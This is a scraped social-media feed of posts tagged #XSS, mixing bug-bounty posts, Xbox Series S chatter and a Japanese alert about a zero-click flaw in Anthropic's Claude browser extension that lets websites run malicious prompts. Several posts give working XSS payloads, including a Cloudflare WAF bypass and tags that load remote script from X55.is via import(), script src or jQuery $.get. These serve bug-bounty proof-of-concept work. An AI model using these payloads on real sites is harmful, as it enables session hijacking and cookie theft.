motch | セキュリティ🛡️
motch | セキュリティ🛡️ @motch_dev ·
🚨 Claude拡張機能にゼロクリックXSS脆弱性発覚!😱 AnthropicのClaude拡張機能に、ウェブサイト訪問だけで悪意あるプロンプトが実行される脆弱性が存在。影響範囲が広く、即時アップデートを!️あなたのブラウザは大丈夫? #セキュリィ #XSX6
1
32
The Legendary Xbot
The Legendary Xbot @DaLegendaryXbot ·
That's what u call treating your wife like a Queen. And before anybody hate on the XSS just remember it run games better than the Switch 2 and a lot of Women love the Switch 2 also 👌�� #Xbox #XSS
Scrag Scrag @ScragtheScav ·
My wife wanted to start gaming with me (mostly fallout 76 and ESO) so I went out and got her an Xbox ! #XboxSeriesS
1
68
xss0r
xss0r @xss0r ·
🔥 Cloudflare WAF? Bypassed. ('/alert?.(7)/') Hundreds of payloads blocked… But one slipped through 👀 ✅ XSS triggered ✅ WAF bypass confirmed Never trust a single layer of defense. #bugbounty #xss #hacking #xss0Hi
2
11
5K
A.Mugh33ra🇵🇰❤️🇵🇸
A.Mugh33ra🇵🇰❤️🇵🇸 @mugh33ra ·
Chained Self‑Stored XSS and Achieved Full 0‑Click ATO 🎯 Honestly, it took me 3 full working days to achieve ATO becasue i am not professional 🙂 Now, hoping for the best InshAllah. Want the write‑up? Drop a comment and I’ll share the full breakdown. �� #BugBounty #ATO #XCm6
6
1
1.8K
0xmru 🇮🇳
0xmru 🇮🇳 @mrunal110 ·
Sharing XSS Challenge Writeup - Intigriti March 2026 Result: Full admin cookie exfiltration. Props to @KulinduKodi for the challenge design & @intigriti for the platform! #xss Read the full writeup: chawdamrunal.medium.com/intigriti-marc…
Intigriti March 2026 XSS Challenge Writeup: Chaining 3 Bypasses to Steal Admin Cookies

How a DOM clobber, a component hijack, and a hidden JSONP endpoint gave me full cookie exfiltration through DOMPurify + CSP + SANITIZE_DOM…

From chawdamrunal.medium.com
1
1
706
KNOXSS
KNOXSS @KN0X55 ·
Improve your #XSS PoCs! Use a remote call to our X55.is domain: ➡️ Replacing alert(1) '-import('//X55.is')-' <Img Src=//X55.is OnLoad=import(src)> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
11
2.8K
Brute Logic
Brute Logic @BRuteLogic ·
Remote Script Call - import() Alternatives jQuery's $.get() &amp; $.getScript() 1. $ is alias for jQuery 2. $.get() can be used with jQuery &lt; v3.2.1 3. both accept `` instead of () with attributes 4. tolerate spaces, new lines etc &lt;Img Src=//X55.is Onload=$.get`src`&gt; #XSS #Bypass
7
2.6K